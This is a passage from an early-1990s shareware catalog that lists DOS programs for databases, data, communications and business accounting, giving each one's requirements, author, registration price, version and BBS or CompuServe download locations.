database. See full + description on page 175. + + Product: Information Please + Free-Form Database, Text Database. See full description on + page 163. + + Chapter 5, "Database applications" 173 + + + + Product: JEPRS (Jeepers!) + Needs: IBM PC, DOS 2.0 or better. 384k RAM. + Author: Louis M. Miranda, 214-522-5110 + Registration: $49.95 + Registration benefits: Printed manual, master disks, 6 months + phone/CompuServe/mail support, bonus utilities. + Version: 2.54 (10-20-91) + User benefits: Printed manual, master disks, 6 months phone/ + CompuServe/mail support, bonus utilities. + Look for: availability unknown on BBSs; JD25*.EXE in IBMAPP forum + LIB 7 (multiple files) on CompuServe. + Download size: 300k + Description: + A bibliographic database system for writers & scientists. You + can add, edit, list, search, format, import, and export + reference citations. References can have a title, authors, + journal or book name, pages, volume, year, type (journal, book, + or abstract), editor, publisher, & keywords. Produces + WordPerfect 5.0/5.1 and PC-Write 3.0 compatible output files, + including boldface, italics, underlining, super- & sub-scripts. + It also reads your manuscript and generates a bibliography for + you. + + Product: The Pool Manager + Football Pool Organizer/Database (all sports). See full + description on page 372. + + Product: STAFF-REPORT + Needs: IBM PC, DOS 3.0 or better. 640k RAM. + Author: MSC - Morariu Software Consulting, 0049-6196-48524 + Registration: $39.00 + Registration benefits: Printed manual, latest version on disk, + phone support. + Version: 2.0 (01-01-91) + User benefits: Printed manual, latest version on disk, phone + support. + Look for: availability unknown on BBSs; STFREP.ZIP in IBMAPP + forum LIB 3 on CompuServe. + Download size: 150k + Special instructions: Product distribution restricted to the + United States. + Description: + Data belonging to a primary and several related secondary DBF + files can be printed into one report. Several printing formats + can be generated, stored and documented for each primary file. + Report generation editor with on screen selection of related + DBF fields. The selection of records to be printed is possible + using a simple filtering or a complex query procedure. Report + can be sent to printer, screen, or to a file on disk. Up to 3 + lines for titles, 3 lines for footer, and 17 lines for the + header. + + Chapter 6, "Data" 174 + + + + + + Chapter 6 + Data + + + 6.1 Words + + Product: WordZ + A Blank Book For YOU To Fill In. See full description on + page 364. + + + 6.2 Mapping data + + Product: VERSAMAP + Draws maps using Micro World Data Bank II. See full + description on page 330. + + Product: WORLD29 + Global Mapping/tracking Geography. See full description on + page 330. + + + 6.3 Marketing data + + 6.3.1 Shareware specific + + Product: CompUser [***] + A Rated Cyclopedia Of The Shareware Arena. See full + description on page 430. + + + 6.4 World facts + + Product: Flags [***] + Displays 600 Flags from around the World. See full description + on page 308. + + Product: On This Day [***] + "What Happened On This Day in History?" See full description + on page 326. + + Product: Save the Planet + Ozone & greenhouse data, easy word processor. See full + description on page 325. + + Product: STS26 + Space Shuttle Tracker. See full description on page 311. + + Chapter 6, "Data" 175 + + + + 6.5 Area codes + + Product: ACCU BBS Lister + WWIV On-line program to determine local BBSs. See full + description on page 181. + + Product: dbDIAL(tm) + 7k TSR Database/Dialer. See full description on page 90. + + Product: Find Area Code (FAC) + Needs: IBM PC, DOS 3.0 or better. CGA monitor; 7k RAM as a TSR; + 138k RAM as a non-TSR. + Author: Mountain Data Systems, 303-773-9515 + Registration: $17.95 + Registration benefits: Latest version mailed via surface or CIS; + no upgrade fees for future releases; lifetime mail/email + support; beta testing available. + Version: 1.61 (11-18-91) + User benefits: Latest version mailed via surface or CIS; no + upgrade fees for future releases; lifetime mail/email support; + beta testing available. + Look for: FAC161.ZIP on BBSs (call 303-673-9470 to download it at + no charge); FAC161.ZIP in IBMCOM forum LIB 2 on CompuServe. + Download size: 115k + Description: + TSR-capable program finds U.S. & foreign telephone area codes. + Search by city, state, country, area code or any text string. + Search your own ASCII file and/or any other external text file + at 800 lines per second on XT. Also has "fuzzy" sound-alike + spelling mode. Runs from DOS command line, or, as 7K TSR. Fully + configurable via DOS environment variable. Onscreen date/time. + Intelligently supports 25/43/50 line text mono/color video + modes, including DESQview, zooming to full screen when + necessary. + + Product: PCFDial + Powerful 7k swapping TSR voice autodialer. See full + description on page 89. + + + 6.6 Software tools + + 6.6.1 For other + + Product: KP5 + Keypunch emulator for IBM PCs. See full description on + page 164. + + Chapter 6, "Data" 176 + + + + 6.7 Other + + Product: KICK + Needs: IBM PC, DOS 2.0 or better. + Author: TexaSoft, 214-291-2115 + Registration: $24.00 + Registration benefits: Includes the book 'A Daily Dose of the + American Dream'..' + Version: 1.0 (07-01-91) + User benefits: Includes the book 'A Daily Dose of the American + Dream'..' + Look for: KICK.ZIP on BBSs; KICK.ZIP in IBMAPP forum LIB 7 on + CompuServe. + Download size: 40k + Description: + A Kick in the Pants and a Pat on the Back is your own computer + mentor. It displays motivational and inspirational messages on + the screen in a pleasant shadowed box. Messages are displayed + at random. Place program in your Autoexec file for a morning + refresher each time you boot. Program contains over 150 + messages based on the book "A Daily Dose of the American + Dream", A.C. Elliott, published by Saybrook. Everyone needs a + kick in the pants or a pat on the back now and then -- get + yours now! + + Product: LJLAND [***] + Print docs, listings, manuals, spreadsheets. See full + description on page 59. + + Chapter 7, "Communications" 177 + + + + + + Chapter 7 + Communications + + + 7.1 General purpose modem communications + + Product: COM-AND + Needs: IBM PC, DOS 2.0 or better. 384k RAM, modem or serial + port. + Author: CABER Software, 310-439-6104 + Registration: $50.00 + Registration benefits: Bonus utilities. + Version: 2.8 (10-19-91) + User benefits: Bonus utilities. + Look for: CA28-*.ZIP (multiple files) on BBSs (call 310-439-7714 + to download it at no charge); CA28-*.ZIP in IBMCOM forum LIB 3 + (multiple files) on CompuServe; CA28-*.ZIP in IBMPC RTC LIB 6 + (multiple files) on GEnie. + Download size: 771k + Description: + A general purpose communications program that may be used by + itself, or with several integrated accessories. Provides + standard comm program functions: dialing directories, macros, + disk log and backscreen, binary and ASCII file transfers, + scripted execution and so on. Included with this version are + scripts providing a file/directory management (FILEMGR), a + learning mode (LEARN), modem/modemless PC to PC file copy + (PC-2-PC) and more. + + Product: EZ-Reader + Needs: IBM PC, DOS 2.0 or better. PKZIP/PKUNZIP; any text + editor. + Author: Thumper Technologies, 918-355-3374 + Registration: $25.00 + Registration benefits: Removes openning screen, enables address + book, and user support. + Version: 1.33 (09-30-90) + User benefits: Removes openning screen, enables address book, and + user support. + Look for: EZ133.ZIP on BBSs (call 918-355-4409 to download it at + no charge). + Download size: 182k + Description: + A full featured mail manager for PCBoard, WildCat!, Major BBS, + and other bulletin board software that supports the QWK (Qmail) + format. EZ-Reader is compatible with these mail doors: QMail, + MarkMail, RoseMail, KMail, DJMail, RAMail, MjrMail, TomCat!, + and other QWK format doors. Enables you to read and reply to + mail while offline saving you money in long distance charges. + Other features include the ability to save and print multiple + messages, view news, bulletins, and new files. + + Chapter 7, "Communications" 178 + + + + Product: EZ-Reader + Needs: IBM PC, DOS 3.0 or better. Appropriate compression + programs. + Author: Thumper Technologies, 918-355-3374 + Registration: $29.00 + Registration benefits: Two hours of free telephone support, + quarterly newsletter, and removal of the opening screen. + Version: 2.00 (08-02-91) + User benefits: Two hours of free telephone support, quarterly + newsletter, and removal of the opening screen. + Look for: EZ200*.ZIP (multiple files) on BBSs (call 918-355-4409 + to download it at no charge). + Download size: 200k + Description: + A complete mail management system enabling the user to read, + create, copy, print, save, fax, and, edit mail. Support for + QMail, MarkMail, RoseMail, RAMail, QWicKer, DJMail, Jimmer, + CMPMail, KMail, DJMail, MjrMail, TomCat!, XRS, TAPCIS, MCI + Mail, and all QWK format mail doors. Internal editor includes + 120,000 word spelling checker. Optionally supports the Sound + Blaster, AdLib, and other sound cards. + + + 7.2 Service-specific programs + + 7.2.1 For CompuServe + + Product: CatScan + CIS catalog manager, TAPCIS script generator. See full + description on page 187. + + Product: EZ-Reader + Mail manager for BBSes, MCI Mail, Compuserve. See full + description on page 177. + + Product: Recon(tm) + CompuServe message file manager/reply editor. See full + description on page 187. + + Chapter 7, "Communications" 179 + + + + Product: TAPCIS + Needs: IBM PC, DOS 3.1 or better. Modem; hard disk or at least + one 720KB floppy drive. + Author: Support Group, Inc., 301-387-4500 + Registration: $79.00 + Registration benefits: 90-day money back guarantee, toll free + support to get connected with CompuServe, TAPCIS Forum for + online support, Introductory CompuServe membership with $15 + usage credit, typeset manual in an attractive book-box. + Version: 5.4 (12-17-91) + User benefits: 90-day money back guarantee, toll free support to + get connected with CompuServe, TAPCIS Forum for online support, + Introductory CompuServe membership with $15 usage credit, + typeset manual in an attractive book-box. + Look for: TAP*.* (multiple files) on BBSs; TAP*.* in TAPCIS forum + LIB 1 (multiple files) on CompuServe. + Download size: 355k + Description: + Designed exclusively for saving time and money on CompuServe, + you can totally automates and greatly simplifies your access to + forums, libraries, and electronic mail. Without TAPCIS + accessing the incredible wealth of information on CompuServe + can be difficult, inefficient, and very expensive. TAPCIS + changes all that by letting you do all your reading, typing, + and thinking offline. Reduces your billable connect time to an + absolute minimum. + + 7.2.2 For GEnie + + Product: EVA + Needs: IBM PC, DOS 3.0 or better. Hard disk; CGA monitor; modem. + Author: Gateway Software + Registration: $35.00 + Registration benefits: Latest version and technical support. + Version: 1.12 (05-01-91) + User benefits: Latest version and technical support. + Look for: EVA112.ZIP on BBSs; EVA112.ZIP in IBMCOM forum LIB 2 + (multiple files) on CompuServe; EVA112A.ZIP in IBM 615;3 RTC + LIB 6 (multiple files) on GEnie. + Download size: 400k + Special instructions: Product distribution restricted to the + United States. + Description: + GEnie Telecom Front End Software with many features: Pull Down + menu, Mouse support, Hypertext Help, Multi-ID, Full and + complete Off-line and On-line Email manager, including: user + friendly editor, Spell Checker, Forward message, Address book, + Mailing List, Archived and Carbon Copy Mail, XMODEM Mail. Chat/ + RTC commands, Index card, and ZMODEM batch download. + + Product: PC Chart (CGA/HGC) + Technical Analysis Charting Program. See full description on + page 239. + + Chapter 7, "Communications" 180 + + + + Product: PC-CHART (EGA/VGA) + Technical Analysis Charting Program. See full description on + page 239. + + 7.2.3 For Prodigy + + Product: PRO$TOCK + Downloads stock quotes from Prodigy. See full description on + page 240. + + Product: PROPLUS + Needs: IBM PC, DOS 3.0 or better. Hard disk. Prodigy software. + Author: Gateway Software + Registration: $35.00 + Registration benefits: Registration Code is mailed out; one free + disk upgrade. + Version: 1.62 (06-15-91) + User benefits: Registration Code is mailed out; one free disk + upgrade. + Look for: PRO162A.ZIP on BBSs; PRO16A.ZIP in IBMCOM forum LIB 2 + (multiple files) on CompuServe; PRO162A.ZIP in IBM M615;3 RTC + LIB 6 (multiple files) on GEnie. + Download size: 320k + Special instructions: Product distribution restricted to the + United States. + Description: + This software package is compatible with Prodigy software. + Features include: A Start-up Menu from where you can run + Prodigy with different auto logon ID. Easy to install and easy + to use configuration program. Save Graphics screen in PCX + format with offline viewer Digital clock. Compatible with all + the graphics mode of the Prodigy. Type ahead keyboard buffer. + keyboard macros with On-line recorder. PRINT in a file. Email + Manager with editor and spell checker. + + 7.2.4 For MCImail + + Product: See Mail + Needs: IBM PC, DOS 3.0 or better. Modem for MCI Mail, or any DOS + NetBIOS based network, or Novell Netware, for LAN based e-mail. + Author: Gnosis Inc + Registration: $50.00 + Registration benefits: Master disks, upgrades through to version + 1.5. Bonus utilities. + Version: 1.3 (03-20-91) + User benefits: Master disks, upgrades through to version 1.5. + Bonus utilities. + Look for: availability unknown on BBSs; SEE-M*.* in PCVENB forum + LIB 11 (multiple files) on CompuServe. + Download size: 500k + Description: + Sophisticated system for LAN &/or MCI Mail (TSR background MCI + Mail, ONLY 25k of RAM!). Tools to manage large volumes of mail. + LAN system supports groups & security + passwords. Integrated + + Chapter 7, "Communications" 181 + + + + database system with Rolodex(r) style PIM facilities, user + definable with screen designer provided. Create LAN/MCI mail, + full support for all addressing (FAX, X400, EMS, etc), EVEN + paper! Store in cabinet + drawers/folders. Smart print mail + double page & other fancy formats/fonts. Mail compression & + archiving. + + + 7.3 Bulletin board software + + Product: COM-AND + Communications and Accessories. See full description on + page 177. + + Product: MegaHost + Needs: IBM PC, DOS 3.1 or better. Hayes modem, hard disk (or a + floppy disk and EMS memory). + Author: ASCII Computer Enterprises + Registration: $29.00 + Registration benefits: BBS support, free upgrades. + Version: 1.1 (02-15-92) + User benefits: BBS support, free upgrades. + Look for: MHST1_1.ZIP on BBSs (call 209-836-2402 to download it + at no charge); MHST11.ZIP in IBMBBS forum LIB 1 on CompuServe; + MHST11.ZIP in BBS RTC LIB 4 on GEnie. + Download size: 250k + Description: + While being a full featured BBS, strong points include simple + configuration, ease of use, and tight security functions. It + is small enough to be run from a floppy (use EMS for overlay + speed) although a hard disk is recommended. Ringback for voice + lines, and Callback for added security. Features include + Conferences, Chat, Message Base, File Download Areas, Doors, + Questionnaire, ANSI Graphics, Bulletins, File Transfer + Protocols, User Defined Menus, Events, and Advanced DOS Shell. + + 7.3.1 Bulletin board utilities + + Product: ACCU BBS Lister + Needs: IBM PC, DOS 3.0 or better. WWIV BBS software. + Author: Kevin Fischer, 619-487-5461 + Registration: $5.00 + Registration benefits: One-time registration; gives you a code + that allows you to put your BBS name in program. + Version: 3.0 (06-18-91) + User benefits: One-time registration; gives you a code that + allows you to put your BBS name in program. + Look for: ACBBSL30.ZIP on BBSs (call 619-566-1745 to download it + at no charge). + Download size: 100k + Description: + An on-line program for WWIV. It allows users to list the BBS + names and number of the systems that are toll-free to them. It + uses the standard BBSLIST.MSG file which is found in the GFILES + + Chapter 7, "Communications" 182 + + + + directory. It allows the Sysop to edit BBS entries, sort the + BBS listing, remove BBS numbers, find duplicates, etc. The + Sysop creates a city database by entering a city name, the area + codes/prefixes that belong to it, and a list of cities that the + city can call toll-free. + + Product: The Laughing Dog Screen Maker [***] + Text-mode Screen Designer w/Code Generation. See full + description on page 285. + + Product: VMiX 386 + MSDOS MultiTasker MultiUser for 8086 to 486. See full + description on page 66. + + + 7.4 Call logging & analysis software + + See also: Utilities, Desktop utilities, Phone dialers + (page 88). + + Product: ACCU BBS Lister + WWIV On-line program to determine local BBSs. See full + description on page 181. + + Product: dbDIAL(tm) + 7k TSR Database/Dialer. See full description on page 90. + + Product: Hotnet + Needs: IBM PC, DOS 3.0 or better. + Author: Robichaux and Associates, 504-752-2620 + Registration: $89.00 + Registration benefits: Printed manual, master disks, 90 day + support. + Version: 3.04 (02-04-92) + User benefits: Printed manual, master disks, 90 day support. + Look for: availability unknown on BBSs; HN304.ZIP in IBMAPP forum + LIB 7 (multiple files) on CompuServe; HOTNET.ZIP in HOSB RTC + LIB 0 (multiple files) on GEnie. + Download size: 470k + Description: + TSR option, LAN ready, single or multi-user help desk system. + If you run a customer service center, problem desk, trouble + shooting center, or a help desk, then Hotnet will do the job. + Quickly captures call descriptions (a real PLUS when the phone + is ringing off the hook!), fast search locates call records -- + recycle your solutions. Let management choose from the pre- + defined reports, or add your own custom reports. + + Chapter 7, "Communications" 183 + + + + Product: LOGGIT + Needs: IBM PC, DOS 3.0 or better. Telix Comm program. + Author: GTX Software, 213-257-2704 + Registration: $12.00 + Registration benefits: Free upgrades for one year. + Version: 4.00 (01-01-91) + User benefits: Free upgrades for one year. + Look for: LOGGIT.ZIP (multiple files) on BBSs (call 414-789-4352 + to download it at no charge); LOGGIT.ZIP in IBMCOM forum LIB 2 + (multiple files) on CompuServe. + Download size: 40k + Description: + A standalone utility to analyze the log file from the TELIX + communication program. Analyzes the .USE file and produces + several reports showing calls made, total time online, average + time per call and other specific information. Mouse support. + Desqview aware. + + Product: PCFDial + Powerful 7k swapping TSR voice autodialer. See full + description on page 89. + + 7.4.1 Phone bill analyzers + + See also: Business, Business finances, Billing systems + (page 205). + + Product: Qanalyst + Needs: IBM PC, DOS 2.0 or better. Qmodem v3.0 or better. + Author: Barn Owl Software, 618-632-7345 + Registration: $15.00 + Registration benefits: Printed manual; 51/4' disk; 30-day return + policy, no questions asked; one year of voice/fax/CompuServe/ + newsletter support. + Version: 2.05 (09-19-90) + User benefits: Printed manual; 51/4' disk; 30-day return policy, no + questions asked; one year of voice/fax/CompuServe/newsletter + support. + Look for: QANA-205.ZIP on BBSs; QANLYS.ZIP in IBMCOM forum LIB 2 + on CompuServe; QANA-205.ZIP in QMODEM RTC LIB 1 on GEnie. + Download size: 160k + Description: + Analyzes Qmodem log files so you know how much you SPEND on + modem calls. Great for CompuServe & GEnie users! Keeps track + of holidays when rates go down. Analyzes uploads & downloads + too, including the cost to transfer files. Powerful + maintenance facility keeps Qmodem log files as small as + possible. Uses call Data standard phone-rate files. + + + 7.5 Modem-based graphics applications + + See also: Graphics (page 331). + + Chapter 7, "Communications" 184 + + + + Product: MakeDemo + Needs: IBM PC, DOS 2.1 or better. CGA monitor recommended. + Printer with IBM extended graphics character set recommended. + Author: WindhamWoods Publishing, 603.893.2667 + Registration: $49.00 + Registration benefits: Latest version, user's manual, 1-800 + telephone support, notification of updates. + Version: 3 (06-04-91) + User benefits: Latest version, user's manual, 1-800 telephone + support, notification of updates. + Look for: MDEM3*.ZIP (multiple files) on BBSs (call 414.789.4210 + to download it at no charge); MDEM3*.EXE in IBMAPP forum LIB 7 + (multiple files) on CompuServe. + Download size: 275k + Description: + Create stunning presentations, including your own "Help," with + various sounds and screen overlays as easily as "Mail Merging." + This is to screens what a good word processor is to paragraphs. + Import text or captured screens. Simulate other software or + "prototype" your own. Easily create your own catalogs-on-disk, + computer-aided-instruction, tutorials, or even your own sales + pitch. 250 screens in a single file; 450 screens typical in up + to 100 files, on a 360 kByte disk. Great for BBSs too! + + + 7.6 File format translators + + See also: Utilities, File utilities, File conversion (page 38). + + Product: PCM100.COM + File transfer utility PC <-> Model 100. See full description + on page 184. + + + 7.7 File transfer protocols + + Product: COM-AND + Communications and Accessories. See full description on + page 177. + + Chapter 7, "Communications" 185 + + + + Product: PCM100.COM + Needs: IBM PC, DOS 2.1 or better. Serial Port (COM1/COM2), null + modem cable, TRS-80 Model 100/200. + Author: Yves Charier, 331-4340-3743 + Registration: $25.00 + Registration benefits: Technical support, source code. + Version: 1.01 (08-25-91) + User benefits: Technical support, source code. + Look for: availability unknown on BBSs; PCM100.ZIP in IBMCOM + forum LIB 3 on CompuServe. + Download size: 28k + Description: + A communications program allowing text files exchanges between + a TRS-80 Model 100 hand-held computer (or compatible) and any + PC-XT (or close compatible, like the Tandy 1000 PC) via the + serial port (RS-232C) and a null-modem adapter. Most of upper + ASCII characters are automatically translated as well during + downloading as well as uploading. + + + 7.8 Fax software + + Product: Total Control + Needs: IBM PC, DOS 3.0 or better. Hayes compatible modem. + Author: Unique Software + Registration: $24.95 + Registration benefits: Reduced rate upgrades; notification of + major upgrades; user support by Fax and CompuServe Mail. + Version: 2.005 (11-15-91) + User benefits: Reduced rate upgrades; notification of major + upgrades; user support by Fax and CompuServe Mail. + Look for: TOTLCTL.EXE on BBSs; TTLCTL.EXE in IBMCOM forum LIB 3 + on CompuServe. + Download size: 108k + Description: + Take total control of your phone line! + * Use your computer with a voice line and/or an answering + machine and/or a fax machine. + * Upgrade your answering machine! + * Monitor your incoming calls and their length! + * Program to NOTIFY you of arrivals of messages, fax's or + computer mail. + * Notification by pocket pager -OR- telephone. + * Use with COM1 - COM4. + * Easy to install with TINSTALL! + * Self Extracting Archive. + + + 7.9 Terminal emulators + + Product: COM-AND + Communications and Accessories. See full description on + page 177. + + Chapter 7, "Communications" 186 + + + + Product: VMiX 386 + MSDOS MultiTasker MultiUser for 8086 to 486. See full + description on page 66. + + + 7.10 Communication utilities + + Product: COM-AND + Communications and Accessories. See full description on + page 177. + + Product: Total Control + Modem, Ans Mach, Fax on one telephone line. See full + description on page 185. + + Product: XRS ("eXpress Response System") + Needs: IBM PC, DOS 3.1 or better. 320k RAM. + Author: Smokin' Software, 803-928-3332 + Registration: $30.00 + Registration benefits: Registered for all future versions. Can + beta-test new versions before public release. + Version: 4.50 (07-21-91) + User benefits: Registered for all future versions. Can beta-test + new versions before public release. + Look for: XRS45*.ZIP (multiple files) on BBSs (call 803-556-7485 + to download it at no charge); XRS45?.ZIP in IBMBBS forum LIB 2 + (multiple files) on CompuServe. + Download size: 600k + Description: + This is a universal offline reader editor for most bulletin + board systems, including Fidonet style and QWK format mail. + Allows users to quickly select, compress and download mail for + offline reading, freeing up the bulletin board for more calls + more often, and saving on long-distance or metered phone + charges for the users. New installation program to + automatically configure the program. (English, Dutch, Swedish, + German and French) + + + 7.11 Software tools + + 7.11.1 For multiple programs + + Product: Serial++ Asynch Comm Library + Asynch comm support library for Borland C++. See full + description on page 293. + + Chapter 7, "Communications" 187 + + + + 7.11.2 For TAPCIS + + Product: CatScan + Needs: IBM PC, DOS 2.0 or better. 200k RAM. TAPCIS and hard + disk recommended. + Author: Rochester Heritage + Registration: $30.00 + Registration benefits: Disk and manual. Upgrades are free for + the download! + Version: 3.0 (06-15-91) + User benefits: Disk and manual. Upgrades are free for the + download! + Look for: availability unknown on BBSs; CATSCN.EXE in TAPCIS + forum LIB 2 on CompuServe. + Download size: 130k + Description: + This TAPCIS add-on program provides several ways to maintain + your CompuServe data library catalogs. You can: + * Compresses catalogs up to 45% + * View catalogs and perform intricate searches + * Generates TAPCIS scripts to update catalogs and download + files + * Automatically delete duplicate file descriptions + * Sort on up to four fields + * Age descriptions to another file + All of this can be done either interactively or from the DOS + command line. + + Product: Recon(tm) + Needs: IBM PC, DOS 2.0 or better. TAPCIS. + Author: Amdox Co. Ltd. + Registration: $36.00 + Registration benefits: CompuServe online support, printed manual, + latest technical release, free standalone bonus utilities. + Version: 2.01 (06-18-91) + User benefits: CompuServe online support, printed manual, latest + technical release, free standalone bonus utilities. + Look for: CHANNEL1 on BBSs (call 617-354-5776 to download it at + no charge); RECON*.* in TAPCIS forum LIB 2 (multiple files) on + CompuServe. + Download size: 290k + Description: + CompuServe/TAPCIS Message file manager, with message/reply + editor & script generator, pulldown menus & command line mode. + Handles forum messages, CMail & INTERNET. Keeps files trimed + and sorted into context, now with forum specific settings. Menu + SHELL organizes TAPCIS & add-ons. Sysop commands, changes + immediately reflected in file. Powerful file navigation & + viewing, multiple sorts, duplicate deletion, filters, search, + print, edit, delete, move or auto-age messages. Context + sensitive help. + + Chapter 7, "Communications" 188 + + + + 7.11.3 For Wildcat! + + Product: EZ-Reader + Offline mail reader for PCBoard & Wildcat! See full + description on page 177. + + Product: EZ-Reader + Mail manager for BBSes, MCI Mail, Compuserve. See full + description on page 177. + + 7.11.4 For PCBoard + + Product: EZ-Reader + Offline mail reader for PCBoard & Wildcat! See full + description on page 177. + + 7.11.5 For Qmodem + + Product: Qanalyst + Phone bill analyzer for people who use Qmodem. See full + description on page 183. + + 7.11.6 For other + + Product: ACCU BBS Lister + WWIV On-line program to determine local BBSs. See full + description on page 181. + + + 7.12 Other + + Product: See Mail + E-mail facility, combines MCI with LAN e-mail. See full + description on page 180. + + Product: TransferTIME (TTIME) + Needs: IBM PC, DOS 3.1 or better. + Author: RGH Software, 616-832-4694 + Registration: $10.00 + Registration benefits: Free upgrades, CompuServe/BBS support. + Version: 2.0 (09-01-91) + User benefits: Free upgrades, CompuServe/BBS support. + Look for: TTIME20.ZIP on BBSs (call 616-768-8761 to download it + at no charge); TTME20.ZIP in IBMCOM forum LIB 2 on CompuServe. + Download size: 136k + Description: + Estimates the time and cost to transfer a file by modem, at + modem speeds of 1200, 2400 and 9600 bps, using the XMODEM, + YMODEM, ZMODEM and CompuServe B+ file transfer protocols. + + Estimates are obtained by giving a file name (for files being + sent from your system) or a file size (for files being sent to + your system). The program can operate in either a prompted + mode, or a command line mode. + + Chapter 7, "Communications" 189 + + + + The cost estimate feature is fully customizable and the program + to change costs is included. + + Chapter 8, "Business" 190 + + + + + + Chapter 8 + Business + + See also: Writing applications, Document boilerplates, Business + specific (page 141); Spreadsheet applications (page 148); + Database applications, Mailing label systems (page 158); Data + (page 174); Communications, Call logging & analysis software + (page 182); Finances (page 239); Graphics, Business + applications (page 339). + + + 8.1 Business finances + + See also: Finances, Personal finances (page 242). + + Product: AMORTZ + The EASY Way to Loan Calculations. See full description on + page 242. + + Product: Chris's Automobile Recorder [***] + Vehicle Operation & Maint. Logger & Reminder. See full + description on page 381. + + Product: DAYO GENERAL LEDGER (GL) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $75.00 + Registration benefits: Multiuser, Unlimited Records & Accounts, + Manual (printed & disk), Phone Support. + Version: 3.0 (06-28-91) + User benefits: Multiuser, Unlimited Records & Accounts, Manual + (printed & disk), Phone Support. + Look for: DAYOGE.EXE (multiple files) on BBSs (call 407-292-4921 + to download it at no charge); DAYOGE.ZIP in IBMAPP forum LIB 5 + (multiple files) on CompuServe. + Download size: 330k + Description: + Provides a means to manage and report company finances. Totally + integrated with the other DAYO packages. Features include + computer generated posting, multiuser, double entry, export + data, 30+ reports, budget management and unlimited accounts. + + Product: Loan Amortization + Loan Calculation and Comparison. See full description on + page 248. + + Chapter 8, "Business" 191 + + + + 8.1.1 Business accounting + + Product: C.A.R.S. + Needs: IBM PC, DOS 3.0 or better. 512k RAM. + Author: Cybernetic Software, 708-677-8358 + Registration: $49.00 + Registration benefits: Printed manual, master disks, 800# phone + support, one free upgrade. + Version: 2.8 (03-27-92) + User benefits: Printed manual, master disks, 800# phone support, + one free upgrade. + Look for: CARS28.ZIP on BBSs (call 312-764-0591 to download it at + no charge); CARS28.ZIP in IBMAPP forum LIB 7 on CompuServe. + Download size: 117k + Description: + Helps organize all of your vehicle expenses. It will track and + report expenses over 26 user definable categories. Version 2.8 + keeps track of distance in miles or kilometers and fuel + consumption in gallons or liters, providing conversions when + necessary. It also logs business and personal trips. Reports + can be generated for any period of months, provideing totals + for tax or accounting purposes. The program will track any + number of vehicles, making it great for company fleets or + multi-car families. + + Product: CheckMate Plus [***] + Needs: IBM PC, DOS 3.0 or better. 640k RAM. Hard disk + recommended. + Author: Custom Technologies, 904-871-5479 + Registration: $35.00 + Registration benefits: Printed manual, phone/fax/CompuServe + support, product discounts. + Version: 1.50 (02-02-92) + User benefits: Printed manual, phone/fax/CompuServe support, + product discounts. + Look for: availability unknown on BBSs; CMPLUS.ZIP in PCVENA + forum LIB 7 (multiple files) on CompuServe. + Download size: 400k + Description: + A complete, "checkbook-based", double-entry accounting system + powerful enough for business but easy enough for home use. + Pull-down menus, pop-up windows, on-line help, calculator w/ + paste, passwords, multiple transaction types, user-defined & + standard reports, prints checks, reconciles, "date-activated" + transactions, PLUS A LOT MORE! + + Chapter 8, "Business" 192 + + + + Product: DAYO ACCOUNTS PAYABLE (AP) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $75.00 + Registration benefits: Multiuser, Unlimited Records, Manual + (printed & disk), Phone Support. + Version: 3.0 (06-28-91) + User benefits: Multiuser, Unlimited Records, Manual (printed & + disk), Phone Support. + Look for: DAYOVE.EXE (multiple files) on BBSs (call 407-292-4921 + to download it at no charge); DAYOVE.ZIP in IBMAPP forum LIB 5 + (multiple files) on CompuServe; DAYOVE.ZIP in IBM RTC LIB 3 + (multiple files) on GEnie. + Download size: 320k + Description: + The 'final chapter' to the processing and maintenance of all + your Payables. Its key mission is to process/post your purchase + orders, however, many other routines have been provided, ie: + Expense Maintenance, 1099 MISC Forms, Purchase Clearing, Vendor + Maintenance, Hand/Manual Checks, Batch Checks, Recurring + Checks, Unlimited Bank Accounts, Unlimited Check Printing + Formats and many reports. + + Product: DAYO TIME & BILLING + Needs: IBM PC, DOS 3.3 or better. 530k RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $95.00 + Registration benefits: Multiuser, Unlimited Records, Manual + (printed & disk), Phone Support. + Version: 3.0 (06-24-91) + User benefits: Multiuser, Unlimited Records, Manual (printed & + disk), Phone Support. + Look for: DAYOTE.EXE (multiple files) on BBSs (call 407-292-4921 + to download it at no charge); DAYOTE.ZIP in IBMAPP forum LIB 5 + (multiple files) on CompuServe; DAYOTE.ZIP in IBM RTC LIB 3 on + GEnie. + Download size: 340k + Description: + Comprises a system of creating invoices for services and/or + products. It has support for an inventory, receivables, + projects and customers/clients. Other features include: + multiuser, unlimited records, project notes, customer notes, + 30+ reports, onscreen viewing of reports, databases are dBase + (tm) compatible, laser formats for invoices and statements, 2 + styles of statements/bills, printer setup & drivers and cash + drawers drivers. + + Product: EASY BANKING + Business or Personal Banking Information Mgr. See full + description on page 245. + + Product: EliteCheck + Extremely easy checkbook/budget management. See full + description on page 253. + + Chapter 8, "Business" 193 + + + + Product: Money Smith + Home Accounting Package for Windows 3.0. See full description + on page 249. + + Product: Painless Accounting + Needs: IBM PC, DOS 2.1 or better. 640k RAM, hard disk. + Author: Painless Accounting, 800-521-9905 + Registration: $125.00 + Registration benefits: Latest copy of the software along with a + 150 page printed manual in a 3 ring binder. Also receive major + discounts on updates. + Version: 5.41 (06-18-91) + User benefits: Latest copy of the software along with a 150 page + printed manual in a 3 ring binder. Also receive major discounts + on updates. + Look for: PAC5*.ARC (multiple files) on BBSs (call 214-596-9164 + to download it at no charge); PAC5*.ARC in IBMAPP forum LIB 5 + (multiple files) on CompuServe; PAC5*.ZIP in IBMPC RTC LIB 3 + (multiple files) on GEnie. + Download size: 600k + Description: + A full feature 11 module accounting system. Modules include: + General Ledger, Billing, Accounts Receivable, Accounts Payable, + Purchases, File Maintenance, Reports, Closing, Beginning + Balance Setup, and Utilities. Program is fully network + compatible, includes the ability to create user defined + Invoice, Statements, Purhcase Order, Received PO, and Check + printing formats. Job Costing, 5 levels of Password protection, + Context sensitive help, and much much more!! + + Product: Painless Acct/Payroll Companion + Needs: IBM PC, DOS 2.1 or better. Painless Accounting or + Painless Payroll software. 640k RAM, hard disk. + Author: Painless Accounting, 800-521-9905 + Registration: $45.00 + Registration benefits: Latest copy of the software along with a + printed manual. Also receive major discounts on updates. + Version: 5.0 (06-04-91) + User benefits: Latest copy of the software along with a printed + manual. Also receive major discounts on updates. + Look for: PAG.ARC on BBSs (call 214-881-0313 to download it at no + charge); PAG.ARC in IBMAPP forum LIB 5 